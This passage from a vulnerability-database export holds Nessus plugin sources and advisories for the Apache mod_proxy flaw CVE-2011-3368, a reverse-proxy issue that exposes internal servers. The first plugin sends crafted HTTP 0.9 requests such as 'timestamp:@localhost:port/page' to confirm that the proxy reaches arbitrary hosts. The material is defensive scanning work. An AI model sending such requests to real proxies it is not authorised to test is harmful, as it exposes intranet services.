script_bugtraq_id(51869);\n\n script_name(english:\"Apache HTTP Server mod_proxy Reverse Proxy HTTP 0.9 Information Disclosure\");\n script_summary(english:\"Make a malformed HTTP request\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The web server running on the remote host has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apache HTTP Server running on the remote host has an\ninformation disclosure vulnerability. When configured as a reverse\nproxy, improper use of the RewriteRule and ProxyPassMatch directives\ncould cause the web server to proxy requests to arbitrary hosts. This\ncould allow a remote attacker to indirectly send requests to intranet\nservers by making specially crafted HTTP 0.9 requests.\n\nThis vulnerability only affects versions 2.2.x before 2.2.18 that have\nbackported the fix for CVE-2011-3368.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545#c15\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.comp.apache.devel/45983\");\n script_set_attribute(attribute:\"see_also\", value:\"http://svn.apache.org/viewvc?view=revision&revision=1188745\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Contact the distro/vendor for the latest update of Apache httpd.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\"); # fixed upstream\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/09\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"apache_mod_proxy_info_leak.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"/tmp/CVE-2011-3368\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this looks like Apache unless paranoid\nif (report_paranoia < 2)\n{\n server = http_server_header(port:port);\n\n if ( 'ibm_http_server' >!< tolower(server) && 'apache' >!< tolower(server) && 'oracle http server' >!< tolower(server) && 'oracle-http-server' >!< tolower(server) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like an Apache-based httpd');\n\n # looks like Apache _httpd_\n if ('apache' >< tolower(server) && ( 'coyote' >< tolower(server) || 'tomcat' >< tolower(server)) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like Apache httpd');\n}\n\npages = make_list('/');\n\nforeach page (pages)\n{\n # GET 1324:@target-host/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host/page\n # instead of responding with an HTTP 400\n url = strcat(unixtime(), ':@', get_host_ip(), page);\n res = http_send_recv3(method:'GET', item:url, version:9, port:port, exit_on_fail:TRUE);\n\n # the patched server should always send a 400.\n # HTTP 0.9 won't send a status line so the best we can do is check for the default 400 page.\n # Need to skip over pages that respond to valid requests with a 503, since we will rely on a\n # 503 response after making the next request\n if ('<title>400 Bad Request</title>' >!< res[2] && '<title>503 Service Temporarily Unavailable</title>' >!< res[2])\n {\n # GET 1324:@target-host:likely-closed-port/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host:likely-closed-port/page\n # instead of responding with an HTTP 400\n url = strcat(unixtime(), ':@localhost:', (rand() % 535 + 65000), page);\n res = http_send_recv3(method:'GET', item:url, version:9, port:port, exit_on_fail:TRUE);\n\n # the patched server should always send a 400. \n # Again, we won't get a status code via HTTP 0.9 so the best we can do is check for the default\n # 503 page (resulting from trying to connect to a closed port)\n if ('<title>503 Service Temporarily Unavailable</title>' >< res[2])\n {\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus verified this by sending the following request :\\n\\n' +\n chomp(http_last_sent_request()) + '\\n';\n\n if (report_verbosity > 0)\n {\n report +=\n '\\nWhich resulted in a non-400 response :\\n\\n' +\n chomp(res[2]) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\nexit(0, 'The web server listening on port '+port+' is likely not affected.');\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:58:03", "description": "Updated httpd packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-21T00:00:00", "type": "nessus", "title": "CentOS 4 / 5 : httpd (CESA-2011:1392)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-suexec", "p-cpe:/a:centos:centos:mod_ssl", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/56570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1392 and \n# CentOS Errata and Security Advisory 2011:1392 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56570);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"CentOS 4 / 5 : httpd (CESA-2011:1392)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55083c8a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0cbcfc97\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1569ea8b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018126.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f65d4a6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-49.ent.centos4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-devel-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-manual-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mod_ssl-2.2.3-53.el5.centos.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-16T02:06:35", "description": "The MITRE CVE database describes these CVEs as :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character. \n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary 'error state' in the backend server) via a malformed HTTP request.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker.\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed.", "cvss3": {"score": null, "vector": null}, "published": "2013-09-04T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd (ALAS-2011-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3348", "CVE-2011-3368"], "modified": "2015-01-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-09.NASL", "href": "https://www.tenable.com/plugins/nessus/69568", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-09.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69568);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2015/01/30 14:43:52 $\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_xref(name:\"ALAS\", value:\"2011-09\");\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-09)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MITRE CVE database describes these CVEs as :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character. \n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when\nused with mod_proxy_balancer in certain configurations, allows remote\nattackers to cause a denial of service (temporary 'error state' in the\nbackend server) via a malformed HTTP request.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker.\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum upgrade httpd' to upgrade your system. Then run 'service\nhttpd restart' to restart the Apache HTTP Server.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-16T01:48:48", "description": "It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)", "cvss3": {"score": null, "vector": null}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd (ALAS-2011-9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3348", "CVE-2011-3368"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-9.NASL", "href": "https://www.tenable.com/plugins/nessus/78270", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-9.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78270);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_xref(name:\"ALAS\", value:\"2011-9\");\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-9)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-19T17:13:26", "description": "This update fixes several security issues in the Apache webserver.\n\nThe patch for the ByteRange remote denial of service attack (CVE-2011-3192) was refined and the configuration options used by upstream were added. Introduce new config option: Allow MaxRanges Number of ranges requested, if exceeded, the complete content is served. default: 200 0|unlimited: unlimited none: Range headers are ignored. This option is a backport from 2.2.21.\n\nAlso fixed: CVE-2011-3348: Denial of service in proxy_ajp when using a undefined method.\n\nCVE-2011-3368: Exposure of internal servers via reverse proxy methods with mod_proxy enabled and incorrect Rewrite or Proxy Rules.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:1217-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-itk-debuginfo", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", 